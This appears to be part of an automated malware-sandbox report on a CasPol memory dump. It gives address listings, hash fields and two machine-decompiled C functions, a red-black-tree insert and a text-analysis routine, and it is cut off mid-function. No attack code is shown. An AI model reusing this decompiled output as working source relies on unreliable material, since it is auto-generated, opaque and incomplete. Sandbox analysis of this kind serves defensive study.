                                                                        0x013e21a9
                                                                        0x013e21ac
                                                                        0x013e21ae
                                                                        0x013e21b3
                                                                        0x013e228b
                                                                        0x013e2290
                                                                        0x013e2379
                                                                        0x013e2296
                                                                        0x013e2298
                                                                        0x013e2298
                                                                        0x013e2290
                                                                        0x013e21b9
                                                                        0x013e21be
                                                                        0x013e22a2
                                                                        0x013e22a2
                                                                        0x013e21c4
                                                                        0x013e21c8
                                                                        0x013e21cc
                                                                        0x013e21d0
                                                                        0x013e21d4
                                                                        0x013e21de
                                                                        0x013e21e3
                                                                        0x01425a29
                                                                        0x01425a2c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425a3b
                                                                        0x00000000
                                                                        0x013e21e9
                                                                        0x013e21e9
                                                                        0x013e21e9
                                                                        0x013e21ee
                                                                        0x013e21f1
                                                                        0x01425a45
                                                                        0x01425a4b
                                                                        0x01425a52
                                                                        0x01425a58
                                                                        0x01425a5d
                                                                        0x01425a5f
                                                                        0x01425a71
                                                                        0x01425a61
                                                                        0x01425a6a
                                                                        0x01425a6a
                                                                        0x01425a76
                                                                        0x01425a79
                                                                        0x01425a7f
                                                                        0x01425a83
                                                                        0x01425a85
                                                                        0x01425a87
                                                                        0x01425a87
                                                                        0x01425a8c
                                                                        0x01425a91
                                                                        0x01425a97
                                                                        0x01425a9f
                                                                        0x01425aa0
                                                                        0x01425aa1
                                                                        0x01425aa6
                                                                        0x01425aab
                                                                        0x01425ab1
                                                                        0x01425ab3
                                                                        0x01425ab9
                                                                        0x01425aca
                                                                        0x01425ad4
                                                                        0x01425ad4
                                                                        0x01425ade
                                                                        0x01425ade
                                                                        0x01425aab
                                                                        0x01425a79
                                                                        0x01425a52
                                                                        0x013e21f7
                                                                        0x013e21f9
                                                                        0x013e21fe
                                                                        0x013e21fe
                                                                        0x013e21e3
                                                                        0x013e2195
                                                                        0x013e236c
                                                                        0x013e2122
                                                                        0x013e2122
                                                                        0x013e2124
                                                                        0x013e2231
                                                                        0x013e2236
                                                                        0x013e2236
                                                                        0x013e2238
                                                                        0x013e2238
                                                                        0x013e2240
                                                                        0x013e2242
                                                                        0x013e2244
                                                                        0x014259fc
                                                                        0x013e218c
                                                                        0x013e218c
                                                                        0x00000000
                                                                        0x013e218c
                                                                        0x013e224a
                                                                        0x013e224f
                                                                        0x013e2256
                                                                        0x013e2304
                                                                        0x013e2309
                                                                        0x013e230f
                                                                        0x013e231e
                                                                        0x013e231e
                                                                        0x013e231e
                                                                        0x013e2320
                                                                        0x013e2325
                                                                        0x013e232a
                                                                        0x013e232c
                                                                        0x013e233e
                                                                        0x013e233e
                                                                        0x00000000
                                                                        0x013e232c
                                                                        0x013e2311
                                                                        0x013e2317
                                                                        0x013e231a
                                                                        0x013e231c
                                                                        0x013e2380
                                                                        0x013e2380
                                                                        0x013e2380
                                                                        0x013e2384
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2386
                                                                        0x00000000
                                                                        0x013e231c
                                                                        0x013e225c
                                                                        0x013e225c
                                                                        0x00000000
                                                                        0x013e225c
                                                                        0x013e212a
                                                                        0x013e2134
                                                                        0x013e2138
                                                                        0x013e213d
                                                                        0x01425858
                                                                        0x01425863
                                                                        0x01425863
                                                                        0x01425867
                                                                        0x0142586a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142586c
                                                                        0x0142586c
                                                                        0x01425871
                                                                        0x01425875
                                                                        0x01425877
                                                                        0x01425997
                                                                        0x0142599c
                                                                        0x014259a1
                                                                        0x014259a7
                                                                        0x014259a7
                                                                        0x00000000
                                                                        0x014259a7
                                                                        0x0142587d
                                                                        0x00000000
                                                                        0x0142588b
                                                                        0x0142588b
                                                                        0x01425890
                                                                        0x01425892
                                                                        0x01425894
                                                                        0x01425899
                                                                        0x0142589b
                                                                        0x014258a0
                                                                        0x014258a0
                                                                        0x014258aa
                                                                        0x014258b2
                                                                        0x014258b6
                                                                        0x014258be
                                                                        0x014258c6
                                                                        0x014258c9
                                                                        0x0142590d
                                                                        0x01425917
                                                                        0x0142591a
                                                                        0x0142591c
                                                                        0x01425920
                                                                        0x01425928
                                                                        0x0142592a
                                                                        0x0142592c
                                                                        0x0142592e
                                                                        0x0142592e
                                                                        0x014258cb
                                                                        0x014258cd
                                                                        0x014258d8
                                                                        0x014258e0
                                                                        0x014258f4
                                                                        0x014258fe
                                                                        0x014258fe
                                                                        0x0142593a
                                                                        0x0142593e
                                                                        0x01425940
                                                                        0x01425942
                                                                        0x00000000
                                                                        0x01425944
                                                                        0x01425944
                                                                        0x01425949
                                                                        0x0142594e
                                                                        0x0142594e
                                                                        0x01425953
                                                                        0x0142595b
                                                                        0x01425976
                                                                        0x01425976
                                                                        0x0142597a
                                                                        0x0142597f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425981
                                                                        0x01425981
                                                                        0x01425981
                                                                        0x01425983
                                                                        0x01425988
                                                                        0x0142598d
                                                                        0x01425991
                                                                        0x01425991
                                                                        0x00000000
                                                                        0x0142595d
                                                                        0x0142595d
                                                                        0x01425963
                                                                        0x01425965
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425967
                                                                        0x01425967
                                                                        0x0142596b
                                                                        0x0142596d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142596f
                                                                        0x01425971
                                                                        0x01425971
                                                                        0x01425974
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425974
                                                                        0x00000000
                                                                        0x01425967
                                                                        0x0142595b
                                                                        0x01425942
                                                                        0x01425863
                                                                        0x013e2143
                                                                        0x013e2143
                                                                        0x013e2149
                                                                        0x013e214f
                                                                        0x013e22f1
                                                                        0x013e22f6
                                                                        0x00000000
                                                                        0x013e2173
                                                                        0x013e2173
                                                                        0x013e217d
                                                                        0x013e2181
                                                                        0x013e2186
                                                                        0x014259ae
                                                                        0x014259b2
                                                                        0x014259b5
                                                                        0x014259b7
                                                                        0x014259ba
                                                                        0x014259cd
                                                                        0x014259d1
                                                                        0x014259d5
                                                                        0x014259d9
                                                                        0x014259db
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014259dd
                                                                        0x014259dd
                                                                        0x014259e1
                                                                        0x014259e4
                                                                        0x014259e7
                                                                        0x014259ee
                                                                        0x014259ee
                                                                        0x014259f3
                                                                        0x014259f3
                                                                        0x00000000
                                                                        0x013e2186
                                                                        0x013e214f
                                                                        0x013e2106
                                                                        0x013e2266
                                                                        0x013e20d8
                                                                        0x013e20da
                                                                        0x013e20e0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 323e051e8d5828c5baf4dee46c639ebbcc6ae2b42af6b35972e4051f64661fe5
                                                                        • Instruction ID: a572084f7f24790aa4bbd4479efb277c660e93ea85302fd9f1b3d2449cc1649a
                                                                        • Opcode Fuzzy Hash: 323e051e8d5828c5baf4dee46c639ebbcc6ae2b42af6b35972e4051f64661fe5
                                                                        • Instruction Fuzzy Hash: A5F127316083229FE726CF2CC44476B7BE9AF85328F48851EE9959B3E1D774D881CB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013CB090 Relevance: .4, Instructions: 405COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 99%
                                                                        			E013CB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                                                        0x013cb095
                                                                        0x013cb09b
                                                                        0x013cb09f
                                                                        0x013cb0a5
                                                                        0x013cb0a7
                                                                        0x013cb0aa
                                                                        0x013cb0ad
                                                                        0x013cb0b1
                                                                        0x013cb3f8
                                                                        0x013cb3fa
                                                                        0x013cb3ff
                                                                        0x013cb419
                                                                        0x013cb41b
                                                                        0x013cb41b
                                                                        0x013cb401
                                                                        0x00000000
                                                                        0x013cb0b7
                                                                        0x013cb0b9
                                                                        0x013cb0bc
                                                                        0x013cb0c0
                                                                        0x013cb0c2
                                                                        0x013cb0c2
                                                                        0x013cb0c4
                                                                        0x013cb0c8
                                                                        0x013cb0cf
                                                                        0x013cb0d1
                                                                        0x013cb0d1
                                                                        0x013cb0da
                                                                        0x013cb0dd
                                                                        0x013cb0df
                                                                        0x013cb0df
                                                                        0x013cb0e4
                                                                        0x013cb0e9
                                                                        0x013cb3e2
                                                                        0x013cb3e5
                                                                        0x013cb3eb
                                                                        0x0141a676
                                                                        0x0141a67b
                                                                        0x0141a67d
                                                                        0x013cb3f1
                                                                        0x013cb3f1
                                                                        0x013cb3f1
                                                                        0x013cb0ef
                                                                        0x013cb0ef
                                                                        0x013cb0ef
                                                                        0x013cb0e9
                                                                        0x013cb0f6
                                                                        0x013cb28d
                                                                        0x013cb28e
                                                                        0x013cb293
                                                                        0x013cb0fc
                                                                        0x013cb0fc
                                                                        0x013cb101
                                                                        0x013cb104
                                                                        0x013cb107
                                                                        0x013cb10c
                                                                        0x0141a687
                                                                        0x0141a68d
                                                                        0x0141a68d
                                                                        0x0141a687
                                                                        0x013cb112
                                                                        0x013cb116
                                                                        0x0141a696
                                                                        0x0141a69c
                                                                        0x0141a69c
                                                                        0x0141a696
                                                                        0x013cb120
                                                                        0x013cb121
                                                                        0x013cb124
                                                                        0x013cb127
                                                                        0x013cb12a
                                                                        0x013cb12d
                                                                        0x013cb132
                                                                        0x0141a6a5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141a6ab
                                                                        0x00000000
                                                                        0x013cb138
                                                                        0x013cb138
                                                                        0x013cb13a
                                                                        0x013cb193
                                                                        0x013cb197
                                                                        0x013cb19d
                                                                        0x013cb29c
                                                                        0x013cb29f
                                                                        0x013cb2a2
                                                                        0x013cb2a7
                                                                        0x0141a6d2
                                                                        0x0141a6d8
                                                                        0x0141a6d8
                                                                        0x0141a6d2
                                                                        0x013cb2af
                                                                        0x013cb420
                                                                        0x013cb422
                                                                        0x013cb423
                                                                        0x00000000
                                                                        0x013cb2b5
                                                                        0x013cb2b5
                                                                        0x013cb2ba
                                                                        0x0141a6e1
                                                                        0x0141a6e7
                                                                        0x0141a6e7
                                                                        0x0141a6e1
                                                                        0x013cb2c2
                                                                        0x00000000
                                                                        0x013cb2c8
                                                                        0x013cb2cb
                                                                        0x013cb2d0
                                                                        0x0141a6f0
                                                                        0x0141a6f6
                                                                        0x0141a6f6
                                                                        0x0141a6f0
                                                                        0x013cb2d8
                                                                        0x00000000
                                                                        0x013cb2de
                                                                        0x013cb2de
                                                                        0x013cb2de
                                                                        0x013cb2e1
                                                                        0x013cb2e6
                                                                        0x013cb2eb
                                                                        0x0141a6ff
                                                                        0x0141a705
                                                                        0x0141a705
                                                                        0x0141a6ff
                                                                        0x013cb2f3
                                                                        0x00000000
                                                                        0x013cb2f9
                                                                        0x013cb2fb
                                                                        0x013cb2fd
                                                                        0x013cb301
                                                                        0x013cb303
                                                                        0x013cb303
                                                                        0x013cb308
                                                                        0x013cb30b
                                                                        0x013cb310
                                                                        0x013cb312
                                                                        0x013cb312
                                                                        0x013cb31c
                                                                        0x013cb322
                                                                        0x013cb327
                                                                        0x0141a70e
                                                                        0x013cb335
                                                                        0x013cb337
                                                                        0x0141a71d
                                                                        0x0141a723
                                                                        0x0141a723
                                                                        0x0141a71d
                                                                        0x013cb340
                                                                        0x013cb345
                                                                        0x013cb349
                                                                        0x0141a72a
                                                                        0x0141a72a
                                                                        0x013cb352
                                                                        0x013cb357
                                                                        0x013cb359
                                                                        0x013cb359
                                                                        0x013cb365
                                                                        0x013cb367
                                                                        0x013cb36c
                                                                        0x00000000
                                                                        0x013cb36c
                                                                        0x0141a714
                                                                        0x0141a714
                                                                        0x013cb32f
                                                                        0x013cb3b8
                                                                        0x013cb3bd
                                                                        0x013cb3c4
                                                                        0x013cb425
                                                                        0x013cb427
                                                                        0x013cb429
                                                                        0x013cb429
                                                                        0x013cb427
                                                                        0x013cb3c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cb3ce
                                                                        0x013cb42f
                                                                        0x013cb3d0
                                                                        0x013cb3d0
                                                                        0x013cb3d0
                                                                        0x013cb3d7
                                                                        0x013cb3da
                                                                        0x013cb3da
                                                                        0x00000000
                                                                        0x013cb32f
                                                                        0x013cb2f3
                                                                        0x013cb2d8
                                                                        0x013cb2c2
                                                                        0x013cb2af
                                                                        0x013cb1a3
                                                                        0x013cb1a9
                                                                        0x013cb1af
                                                                        0x013cb1b2
                                                                        0x013cb1b5
                                                                        0x013cb1b8
                                                                        0x0141a733
                                                                        0x0141a739
                                                                        0x0141a739
                                                                        0x0141a733
                                                                        0x013cb1c0
                                                                        0x00000000
                                                                        0x013cb1c6
                                                                        0x013cb1c8
                                                                        0x013cb1cb
                                                                        0x013cb1ce
                                                                        0x013cb1d3
                                                                        0x0141a742
                                                                        0x0141a748
                                                                        0x0141a748
                                                                        0x0141a742
                                                                        0x013cb1db
                                                                        0x00000000
                                                                        0x013cb1e1
                                                                        0x013cb1e1
                                                                        0x013cb1e6
                                                                        0x013cb1e9
                                                                        0x013cb1ee
                                                                        0x0141a751
                                                                        0x013cb409
                                                                        0x013cb409
                                                                        0x013cb40e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cb410
                                                                        0x013cb22d
                                                                        0x013cb22f
                                                                        0x0141a790
                                                                        0x0141a796
                                                                        0x0141a796
                                                                        0x0141a790
                                                                        0x013cb23d
                                                                        0x013cb243
                                                                        0x013cb248
                                                                        0x0141a79f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141a7a5
                                                                        0x00000000
                                                                        0x013cb24e
                                                                        0x013cb24e
                                                                        0x013cb250
                                                                        0x013cb374
                                                                        0x013cb379
                                                                        0x013cb37e
                                                                        0x0141a7ae
                                                                        0x0141a7b4
                                                                        0x0141a7b4
                                                                        0x0141a7ae
                                                                        0x013cb386
                                                                        0x00000000
                                                                        0x013cb38c
                                                                        0x013cb38e
                                                                        0x0141a7bd
                                                                        0x013cb394
                                                                        0x013cb394
                                                                        0x013cb394
                                                                        0x013cb39b
                                                                        0x013cb39e
                                                                        0x00000000
                                                                        0x013cb39e
                                                                        0x013cb386
                                                                        0x013cb256
                                                                        0x013cb258
                                                                        0x0141a7c6
                                                                        0x0141a7cc
                                                                        0x0141a7cc
                                                                        0x0141a7c6
                                                                        0x013cb261
                                                                        0x013cb266
                                                                        0x013cb26a
                                                                        0x0141a7d3
                                                                        0x0141a7d3
                                                                        0x013cb273
                                                                        0x013cb278
                                                                        0x013cb27a
                                                                        0x013cb27a
                                                                        0x013cb281
                                                                        0x013cb283
                                                                        0x013cb285
                                                                        0x013cb287
                                                                        0x013cb289
                                                                        0x00000000
                                                                        0x013cb289
                                                                        0x013cb248
                                                                        0x0141a757
                                                                        0x0141a757
                                                                        0x013cb1f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cb1fc
                                                                        0x013cb201
                                                                        0x0141a760
                                                                        0x0141a766
                                                                        0x0141a766
                                                                        0x0141a760
                                                                        0x013cb209
                                                                        0x013cb3a8
                                                                        0x0141a76f
                                                                        0x013cb3ae
                                                                        0x013cb3ae
                                                                        0x013cb3ae
                                                                        0x013cb3b0
                                                                        0x00000000
                                                                        0x013cb20f
                                                                        0x013cb20f
                                                                        0x013cb213
                                                                        0x0141a778
                                                                        0x0141a77e
                                                                        0x0141a77e
                                                                        0x0141a778
                                                                        0x013cb21b
                                                                        0x00000000
                                                                        0x013cb221
                                                                        0x013cb223
                                                                        0x0141a787
                                                                        0x013cb229
                                                                        0x013cb229
                                                                        0x013cb229
                                                                        0x013cb22b
                                                                        0x00000000
                                                                        0x013cb22b
                                                                        0x013cb21b
                                                                        0x013cb209
                                                                        0x013cb1db
                                                                        0x013cb142
                                                                        0x013cb142
                                                                        0x013cb146
                                                                        0x013cb148
                                                                        0x013cb14c
                                                                        0x013cb14f
                                                                        0x013cb154
                                                                        0x013cb15b
                                                                        0x0141a6b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141a6ba
                                                                        0x0141a6ba
                                                                        0x013cb163
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cb163
                                                                        0x013cb13a
                                                                        0x013cb169
                                                                        0x013cb16b
                                                                        0x013cb16e
                                                                        0x013cb171
                                                                        0x013cb175
                                                                        0x013cb178
                                                                        0x0141a6c3
                                                                        0x0141a6c9
                                                                        0x0141a6c9
                                                                        0x0141a6c3
                                                                        0x013cb180
                                                                        0x013cb184
                                                                        0x00000000
                                                                        0x013cb104
                                                                        0x013cb0f6

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                        • Instruction ID: 44053cd5fb26686f6bfce4a8ca3d2ef99269bb20eb56f11161e796eaf0006f20
                                                                        • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                        • Instruction Fuzzy Hash: B8D107317043558BDB22CE2DC48236AFBE6AF84A9CB28856DDCA5CB35EE731DC418750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B0D20 Relevance: .4, Instructions: 372COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 99%
                                                                        			E013B0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
